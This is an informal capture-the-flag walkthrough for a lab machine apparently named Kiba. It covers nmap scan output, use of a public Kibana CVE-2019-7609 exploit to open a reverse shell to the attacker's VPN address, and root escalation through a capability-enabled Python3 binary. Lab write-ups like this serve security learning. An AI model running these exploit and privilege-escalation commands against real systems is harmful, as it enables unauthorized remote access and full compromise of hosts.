22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:d1:57:13:24:81:b6:18:5d:04:8e:d2:38:4f:90 (RSA)
|   256 e1:e6:7a:a1:a1:1c:be:03:d2:4e:27:1b:0d:0a:ec:b1 (ECDSA)
|_  256 2a:ba:e5:c5:fb:51:38:17:45:e7:b1:54:ca:a1:a3:fc (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

and got port 5601 thats kibna 

searching google for kibana rce exploit i got this 
https://github.com/mpgn/CVE-2019-7609

wget https://raw.githubusercontent.com/LandGrey/CVE-2019-7609/master/CVE-2019-7609-kibana-rce.py

then run this

pyhton CVE-2019-7609-kibana-rce.py -u 10.10.188.47:5601 -host <your vpn> -port 1234 --shell

kabooom we got reverse shell.....

thennnn go for privesc using Capabilities 

ls -la in kiba we have some dir thats .hackmeplease the look into this we got python3

Exploiting capability using python3

cd .hackmeplease
getcap -r / 2>/dev/null
ls -al python3
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
id

